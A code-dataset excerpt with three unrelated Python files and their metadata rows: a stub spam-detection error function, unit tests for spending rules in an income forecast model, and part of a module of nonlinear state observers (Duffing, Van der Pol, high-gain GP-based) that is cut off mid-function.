src/error_analysis.py
|
exue026/spam-detection-model
|
1a8afc4b4403ef49d8ebbdb5fbcb56c643996b1d
|
[
"MIT"
] | null | null | null |
src/error_analysis.py
|
exue026/spam-detection-model
|
1a8afc4b4403ef49d8ebbdb5fbcb56c643996b1d
|
[
"MIT"
] | null | null | null |
def analyze_error():
return 0
| 16.5
| 20
| 0.69697
| 5
| 33
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0.212121
| 33
| 2
| 21
| 16.5
| 0.807692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
712c62ad55677b24a65bfa64e5786ad4b35a9859
| 2,070
|
py
|
Python
|
tests/test_spending_rules.py
|
davidjohnoliver/IncomeForecast
|
f638a16a3bccb576f7977f9ea3fc08047c96ecce
|
[
"MIT"
] | null | null | null |
tests/test_spending_rules.py
|
davidjohnoliver/IncomeForecast
|
f638a16a3bccb576f7977f9ea3fc08047c96ecce
|
[
"MIT"
] | null | null | null |
tests/test_spending_rules.py
|
davidjohnoliver/IncomeForecast
|
f638a16a3bccb576f7977f9ea3fc08047c96ecce
|
[
"MIT"
] | null | null | null |
import spending_rules
import model
import math
def standard_previous_deltas():
return model.deltas_state.from_year(1999)
def standard_previous_funds():
return model.funds_state(0, 0, 1999)
def test_get_luxury_over_basic():
rule = spending_rules.get_luxury_over_basic(20000, 0.05)
new_delta = model.get_updated_deltas_from_rules(standard_previous_funds(), standard_previous_deltas().update_spending(50000), [rule])
assert 51500 == new_delta.spending
def test_get_luxury_over_basic_capped_below():
rule = spending_rules.get_luxury_over_basic_capped(20000, 0.05, 0.9)
def set_salary(deltas: model.deltas_state, previous_funds: model.funds_state, previous_deltas: model.deltas_state):
return deltas.update_gross_salary(100000)
new_delta = model.get_updated_deltas_from_rules(standard_previous_funds(), standard_previous_deltas().update_spending(50000), [set_salary, rule])
assert 51500 == new_delta.spending
def test_get_luxury_over_basic_capped_above():
rule = spending_rules.get_luxury_over_basic_capped(20000, 0.05, 0.9)
def set_salary(deltas: model.deltas_state, previous_funds: model.funds_state, previous_deltas: model.deltas_state):
return deltas.update_gross_salary(55800)
new_delta = model.get_updated_deltas_from_rules(standard_previous_funds(), standard_previous_deltas().update_spending(50000), [set_salary, rule])
assert 50220 == new_delta.spending
def test_get_maxed_or_zeroed_out():
end_region = 0.1
c_m = 0.3
assert c_m == spending_rules.get_maxed_or_zeroed_out(0.5, c_m, end_region)
assert c_m == spending_rules.get_maxed_or_zeroed_out(0.1, c_m, end_region)
assert math.isclose(c_m, spending_rules.get_maxed_or_zeroed_out(0.9, c_m, end_region))
assert 0 == spending_rules.get_maxed_or_zeroed_out(0, c_m, end_region)
assert 1 == spending_rules.get_maxed_or_zeroed_out(1, c_m, end_region)
assert c_m / 2 == spending_rules.get_maxed_or_zeroed_out(0.05, c_m, end_region)
assert c_m / 2 == spending_rules.get_maxed_or_zeroed_out(0.05, c_m, end_region)
| 51.75
| 149
| 0.786957
| 333
| 2,070
| 4.441441
| 0.162162
| 0.017579
| 0.108181
| 0.086545
| 0.855308
| 0.821501
| 0.774172
| 0.721433
| 0.699121
| 0.699121
| 0
| 0.055373
| 0.118841
| 2,070
| 40
| 150
| 51.75
| 0.755482
| 0
| 0
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.30303
| 1
| 0.242424
| false
| 0
| 0.090909
| 0.121212
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
71388b3a756ae644ef76b02ab16b59d8cb0ce9bb
| 40,172
|
py
|
Python
|
observers.py
|
Data-Science-in-Mechanical-Engineering/joint_state_dynamics_estimation_HGOs_GPs
|
5980ad4ec1e94c4a2eeb5829b27effee5e069370
|
[
"MIT"
] | null | null | null |
observers.py
|
Data-Science-in-Mechanical-Engineering/joint_state_dynamics_estimation_HGOs_GPs
|
5980ad4ec1e94c4a2eeb5829b27effee5e069370
|
[
"MIT"
] | null | null | null |
observers.py
|
Data-Science-in-Mechanical-Engineering/joint_state_dynamics_estimation_HGOs_GPs
|
5980ad4ec1e94c4a2eeb5829b27effee5e069370
|
[
"MIT"
] | 4
|
2021-02-17T05:14:11.000Z
|
2021-03-08T14:00:18.000Z
|
import logging
import numpy as np
from scipy.integrate import solve_ivp
from utils import reshape_pt1, reshape_pt1_tonormal, reshape_dim1
# Possible observers (dynamics functions f(x_estim, u)) and functions to
# produce measured data from true data
# Input x, u, version and parameters, output x at the next step (dt
# later) with scipy ODE solver
def dynamics_traj_observer(x0, u, y, t0, dt, init_control, discrete=False,
version=None, method='RK45', t_span=[0, 1],
t_eval=[0.1], GP=None, **kwargs):
if discrete:
xtraj = np.zeros((len(t_eval), x0.shape[1]))
xtraj[0] = reshape_pt1(x0)
t = t0
i = 0
while (i < len(t_eval) - 1) and (t < t_eval[-1]):
i += 1
xnext = reshape_pt1(
version(t, xtraj[-1], u, y, t0, init_control, GP, **kwargs))
xtraj[i] = xnext
t += dt
else:
sol = solve_ivp(
lambda t, x: version(t, x, u, y, t0, init_control, GP, **kwargs),
t_span=t_span, y0=reshape_pt1_tonormal(x0), method=method,
t_eval=t_eval)
xtraj = reshape_pt1(sol.y.T)
return reshape_pt1(xtraj)
# Observer for the continuous time Duffing equation
# Source: Observer design for the duffing equation using Gersgorin’s theorem,
# by Alberto Delgado
def duffing_observer_Delgado(t, xhat, u, y, t0, init_control, GP, kwargs):
alpha = kwargs.get('alpha')
beta = kwargs.get('beta')
delta = kwargs.get('delta')
xhat = reshape_pt1(xhat)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# My gains
l1 = delta - 5
l2 = alpha - delta ** 2 + 3 * beta * xhat[:, 0] ** 2
# # Delgado gains
# l1 = - 5
# l2 = - (alpha + 3 * xhat[:, 0] ** 2)
A = reshape_pt1([[0, 1], [-alpha, -delta]])
F1 = reshape_dim1(np.zeros_like(xhat[:, 0]))
F2 = reshape_dim1(- beta * xhat[:, 0] ** 3)
F = reshape_pt1(np.concatenate((F1, F2), axis=1))
LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
xhatdot = reshape_pt1(np.dot(A, reshape_pt1_tonormal(xhat)) + F + LC + u)
return xhatdot
# Observer for the discrete time Duffing map
# Source: Observer design for the duffing equation using Gersgorin’s theorem,
# by Alberto Delgado
def duffing_observer_Delgado_discrete(t, xhat, u, y, t0, init_control, GP,
kwargs):
alpha = kwargs.get('alpha')
beta = kwargs.get('beta')
delta = kwargs.get('delta')
xhat = reshape_pt1(xhat)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# My gains
l1 = -0.1
l2 = -0.1
# # Delgado gains
# l1 = - 5
# l2 = - (alpha + 3 * xhat[:, 0] ** 2)
A = reshape_pt1([[0, 1], [-alpha, -delta]])
F1 = reshape_dim1(np.zeros_like(xhat[:, 0]))
F2 = reshape_dim1(- beta * xhat[:, 0] ** 3)
F = reshape_pt1(np.concatenate((F1, F2), axis=1))
LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
xhatnext = reshape_pt1(np.dot(A, reshape_pt1_tonormal(xhat)) + F + LC + u)
return xhatnext
# Observer for the continuous time Duffing equation
# Using current GP estimation of dynamics for xhat_t+1, + the Delgado gains (
# artificially well chosen for now since form chosen by knowing the
# dynamics...) * (xhat_t - y_t)
def duffing_observer_Delgado_GP(t, xhat, u, y, t0, init_control, GP, kwargs):
alpha = kwargs.get('alpha')
beta = kwargs.get('beta')
delta = kwargs.get('delta')
xhat = reshape_pt1(xhat)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# My gains
l1 = delta - 5
l2 = alpha - delta ** 2 + 3 * beta * xhat[:, 0] ** 2
# # Delgado gains
# l1 = - 5
# l2 = - (alpha + 3 * xhat[:, 0] ** 2)
if GP:
if 'GP' in GP.__class__.__name__:
mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
reshape_pt1(u))
if not kwargs.get('continuous_model'):
# In this case we have continuous observer dynamics, but GP is
# discrete # TODO better than Euler?
mean = (mean - xhat) / GP.prior_kwargs.get('dt')
GP.prior_kwargs['observer_gains'] = {'l1': l1, 'l2': l2}
else:
mean = GP(reshape_pt1(xhat), reshape_pt1(u),
kwargs.get('prior_kwargs'))
else:
mean = np.zeros_like(u)
LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
xhatdot = reshape_pt1(mean + LC)
return xhatdot
# Observer for the discrete time Duffing map
# Using current GP estimation of dynamics for xhat_t+1, + the Delgado gains (
# artificially well chosen for now since form chosen by knowing the
# dynamics...) * (xhat_t - y_t)
def duffing_observer_Delgado_GP_discrete(t, xhat, u, y, t0, init_control, GP,
kwargs):
xhat = reshape_pt1(xhat)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# My gains
l1 = -0.8
l2 = -0.8
# # Delgado gains
# l1 = - 5
# l2 = - (alpha + 3 * xhat[:, 0] ** 2)
if GP:
if 'GP' in GP.__class__.__name__:
mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
reshape_pt1(u))
else:
mean = GP(reshape_pt1(xhat), reshape_pt1(u),
kwargs.get('prior_kwargs'))
else:
mean = np.zeros_like(u)
LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
xhatnext = reshape_pt1(mean + LC)
return xhatnext
# High gain extended observer for the continuous time Duffing equation
# Using current GP estimation of dynamics for xi_dot, high gain observer
# from Michelangelo's paper, extended with extra state variable xi
def duffing_observer_Michelangelo_GP(t, xhat, u, y, t0, init_control, GP,
kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x[:, :-1])
xi = reshape_pt1(x[:, -1])
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gain (needs to be large enough)
g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
Gamma2 = reshape_pt1([k3 * g ** 3])
if GP:
if 'GP' in GP.__class__.__name__:
mean_deriv, var_deriv, lowconf_deriv, uppconf_deriv = \
GP.predict_deriv(reshape_pt1(xhat), reshape_pt1(u), only_x=True)
GP.prior_kwargs['observer_gains'].update({'g': g, 'Gamma1': Gamma1,
'Gamma2': Gamma2,
'k1': k1, 'k2': k2,
'k3': k3})
else:
mean_deriv = GP(reshape_pt1(xhat), reshape_pt1(u),
kwargs.get('prior_kwargs'))
else:
mean_deriv = np.zeros_like(xhat)
if np.any(kwargs.get('saturation')):
# Saturate the derivative of the nonlinearity estimate to guarantee
# contraction
a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
mean_deriv = np.clip(mean_deriv, a_min=a_min, a_max=a_max)
A = reshape_pt1([[0, 1], [0, 0]])
B = reshape_pt1([[0], [1]])
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
np.dot(B, reshape_pt1_tonormal(xi))
DfA = reshape_pt1(np.dot(reshape_pt1_tonormal(mean_deriv),
reshape_pt1_tonormal(ABmult + u)))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
LC2 = reshape_pt1(Gamma2 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1 + u)
xidot = reshape_pt1(DfA + LC2)
# Also check eigenvalues of M for stability without high gain
AB = np.concatenate((A, B), axis=1)
ABO = np.concatenate((AB, np.zeros_like(reshape_pt1(AB[0]))), axis=0)
K = np.array([[k1, k2, k3]])
C = np.zeros_like(x)
C[0, 0] = 1
M = ABO - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return np.concatenate((xhatdot, xidot), axis=1)
# High gain extended observer for the continuous time Duffing equation
# Using current LS estimationfor xi_dot, high gain observer
# from Michelangelo's paper, extended with extra state variable xi
def duffing_observer_Michelangelo_LS(t, xhat, u, y, t0, init_control, LS_deriv,
kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x[:, :-1])
xi = reshape_pt1(x[:, -1])
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gain (needs to be large enough)
g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
Gamma2 = reshape_pt1([k3 * g ** 3])
if LS_deriv:
mean_deriv = LS_deriv(reshape_pt1(xhat), reshape_pt1(u),
kwargs.get('prior_kwargs'))
else:
mean_deriv = np.zeros_like(xhat)
if np.any(kwargs.get('saturation')):
# Saturate the derivative of the nonlinearity estimate to guarantee
# contraction
a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
mean_deriv = np.clip(mean_deriv, a_min=a_min, a_max=a_max)
A = reshape_pt1([[0, 1], [0, 0]])
B = reshape_pt1([[0], [1]])
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
np.dot(B, reshape_pt1_tonormal(xi))
DfA = reshape_pt1(np.dot(reshape_pt1_tonormal(mean_deriv),
reshape_pt1_tonormal(ABmult + u)))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
LC2 = reshape_pt1(Gamma2 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1 + u)
xidot = reshape_pt1(DfA + LC2)
# Also check eigenvalues of M for stability without high gain
AB = np.concatenate((A, B), axis=1)
ABO = np.concatenate((AB, np.zeros_like(reshape_pt1(AB[0]))), axis=0)
K = np.array([[k1, k2, k3]])
C = np.zeros_like(x)
C[0, 0] = 1
M = ABO - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return np.concatenate((xhatdot, xidot), axis=1)
# Observer for the continuous time Van der Pol equation
# Source: Inspired by Observer design for the duffing equation using
# Gersgorin’s theorem, by Alberto Delgado, using the approximation x**2v -
# xhat**2vhat approximately 2xhatvhat (x-xhat)
def VanderPol_observer_simplified(t, xhat, u, y, t0, init_control, GP, kwargs):
mu = kwargs.get('mu')
xhat = reshape_pt1(xhat)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# My gains
l1 = mu - 5
# l2 = 1 - mu ** 2 - 2 * mu * xhat[:, 0] * xhat[:, 1]
l2 = 1 - mu ** 2 - 2 * mu * xhat[:, 0]
A = reshape_pt1([[0, 1], [-1, 0]])
F = reshape_pt1([0, mu * (1 - xhat[:, 0] ** 2) * xhat[:, 1]])
LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
xhatdot = reshape_pt1(np.dot(A, reshape_pt1_tonormal(xhat)) + F + LC + u)
return xhatdot
# Linear Luenberger observer for harmonic oscillator, with control law u(t),
# continuous time
def harmonic_oscillator_observer_GP(t, xhat, u, y, t0, init_control, GP,
kwargs):
k = kwargs.get('k')
m = kwargs.get('m')
xhat = reshape_pt1(xhat)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gains
l1 = - 1
l2 = k / m - 1
if GP:
if 'GP' in GP.__class__.__name__:
mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
reshape_pt1(u))
if not kwargs.get('continuous_model'):
# In this case we have continuous observer dynamics, but GP is
# discrete # TODO better than Euler?
mean = (mean - xhat) / GP.prior_kwargs.get('dt')
GP.prior_kwargs['observer_gains'] = {'l1': l1, 'l2': l2}
else:
mean = GP(reshape_pt1(xhat), reshape_pt1(u),
kwargs.get('prior_kwargs'))
else:
mean = np.zeros_like(u)
LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
xhatdot = reshape_pt1(mean + LC)
return xhatdot
# High gain extended observer from Michelangelo for the WDC data
# Using current GP estimation of dynamics for xi_dot, high gain observer
# from Michelangelo's paper, extended with extra state variable xi
def WDC_observer_Michelangelo_GP(t, xhat, u, y, t0, init_control, GP, kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x[:, :-1])
xi = reshape_pt1(x[:, -1])
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gain (needs to be large enough)
g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
Gamma2 = reshape_pt1([k3 * g ** 3])
if GP:
if 'GP' in GP.__class__.__name__:
mean_deriv, var_deriv, lowconf_deriv, uppconf_deriv = \
GP.predict_deriv(reshape_pt1(xhat), reshape_pt1(u), only_x=True)
GP.prior_kwargs['observer_gains'].update({'g': g, 'Gamma1': Gamma1,
'Gamma2': Gamma2,
'k1': k1, 'k2': k2,
'k3': k3})
else:
mean_deriv = GP(reshape_pt1(xhat), reshape_pt1(u),
kwargs.get('prior_kwargs'))
else:
mean_deriv = np.zeros_like(xhat)
if np.any(kwargs.get('saturation')):
# Saturate the derivative of the nonlinearity estimate to guarantee
# contraction
a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
mean_deriv = np.clip(mean_deriv, a_min=a_min, a_max=a_max)
A = reshape_pt1([[0, 1], [0, 0]])
B = reshape_pt1([[0], [1]])
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
np.dot(B, reshape_pt1_tonormal(xi))
DfA = reshape_pt1(np.dot(reshape_pt1_tonormal(mean_deriv),
reshape_pt1_tonormal(ABmult + u)))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
LC2 = reshape_pt1(Gamma2 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1 + u)
xidot = reshape_pt1(DfA + LC2)
# Also check eigenvalues of M for stability without high gain
AB = np.concatenate((A, B), axis=1)
ABO = np.concatenate((AB, np.zeros_like(reshape_pt1(AB[0]))), axis=0)
K = np.array([[k1, k2, k3]])
C = np.zeros_like(x)
C[0, 0] = 1
M = ABO - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return np.concatenate((xhatdot, xidot), axis=1)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current GP estimation of dynamics for xdot, regular high gain observer
def WDC_observer_highgain_GP(t, xhat, u, y, t0, init_control, GP, kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gain (needs to be large enough)
g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
if GP:
if 'GP' in GP.__class__.__name__:
mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
reshape_pt1(u))
if not kwargs.get('continuous_model'):
# discrete model so need to differentiate it in continuous obs
mean = (mean - xhat) / GP.prior_kwargs.get(
'dt') # TODO better than Euler?
GP.prior_kwargs['observer_gains'].update({'g': g, 'Gamma1': Gamma1,
'k1': k1, 'k2': k2})
else:
mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
'prior_kwargs'))
else:
mean = np.zeros_like(xhat)
if np.any(kwargs.get('saturation')):
# Saturate the derivative of the nonlinearity estimate to guarantee
# contraction
a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
mean = np.clip(mean, a_min=a_min, a_max=a_max)
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(mean + LC1 + u)
return reshape_pt1(xhatdot)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity
def WDC_justvelocity_observer_highgain_GP(t, xhat, u, y, t0, init_control,
GP, kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gain (needs to be large enough)
g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
if GP:
if 'GP' in GP.__class__.__name__:
mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
reshape_pt1(u))
if not kwargs.get('continuous_model'):
# discrete model so need to differentiate it in continuous obs
mean = (mean - reshape_pt1(xhat[:, 1])) / GP.prior_kwargs.get(
'dt') # TODO better than Euler?
GP.prior_kwargs['observer_gains'].update({'g': g, 'Gamma1': Gamma1,
'k1': k1, 'k2': k2})
else:
mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
'prior_kwargs'))
else:
mean = np.zeros_like(reshape_pt1(xhat[:, 1]))
if np.any(kwargs.get('saturation')):
# Saturate the estimate of the nonlinearity to guarantee contraction
a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
mean = np.clip(mean, a_min=a_min, a_max=a_max)
A = reshape_pt1([[0, 1], [0, 0]])
B = reshape_pt1([[0], [1]])
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
np.dot(B, reshape_pt1_tonormal(mean))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1 + u)
# Also check eigenvalues of M for stability without high gain
K = np.array([[k1, k2]])
C = np.zeros_like(xhat)
C[0, 0] = 1
M = A - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return reshape_pt1(xhatdot)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current LS estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity
def WDC_justvelocity_observer_highgain_LS(t, xhat, u, y, t0, init_control,
LS, kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gain (needs to be large enough)
g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
dt = kwargs.get('dt')
if LS:
mean = LS(reshape_pt1(xhat), reshape_pt1(u), kwargs.get('prior_kwargs'))
if not kwargs.get('continuous_model'):
# discrete model so need to differentiate it in continuous obs
mean = (mean - reshape_pt1(xhat[:, 1])) / kwargs.get('dt')
# TODO better than Euler?
else:
mean = np.zeros_like(reshape_pt1(xhat[:, 1]))
if np.any(kwargs.get('saturation')):
# Saturate the estimate of the nonlinearity to guarantee contraction
a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
mean = np.clip(mean, a_min=a_min, a_max=a_max)
A = reshape_pt1([[0, 1], [0, 0]])
B = reshape_pt1([[0], [1]])
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
np.dot(B, reshape_pt1_tonormal(mean))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1 + u)
# Also check eigenvalues of M for stability without high gain
K = np.array([[k1, k2]])
C = np.zeros_like(xhat)
C[0, 0] = 1
M = A - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return reshape_pt1(xhatdot)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity, but returning xnext using
# Euler discretization instead of xdot
def WDC_justvelocity_discrete_observer_highgain_GP(t, xhat, u, y, t0,
init_control, GP, kwargs):
xhatdot = WDC_justvelocity_observer_highgain_GP(t, xhat, u, y, t0,
init_control, GP, kwargs)
xnext = reshape_pt1(xhat + kwargs.get('dt_before_subsampling') * xhatdot)
# TODO better than Euler?
return xnext
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity and with gain following a
# dynamical adaptation law
def WDC_justvelocity_observer_adaptive_highgain_GP(t, xhat, u, y, t0,
init_control, GP, kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x[:, :-1])
g = float(x[:, -1])
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
adaptation_law = \
kwargs.get('prior_kwargs').get('observer_gains').get('adaptation_law')
# Gain (needs to be large enough)
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
if GP:
if 'GP' in GP.__class__.__name__:
mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
reshape_pt1(u))
if not kwargs.get('continuous_model'):
# discrete model so need to differentiate it in continuous obs
mean = (mean - reshape_pt1(xhat[:, 1])) / GP.prior_kwargs.get(
'dt') # TODO better than Euler?
else:
mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
'prior_kwargs'))
else:
mean = np.zeros_like(reshape_pt1(xhat[:, 1]))
if np.any(kwargs.get('saturation')):
# Saturate the estimate of the nonlinearity to guarantee contraction
a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
axis=0)
mean = np.clip(mean, a_min=a_min, a_max=a_max)
A = reshape_pt1([[0, 1], [0, 0]])
B = reshape_pt1([[0], [1]])
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
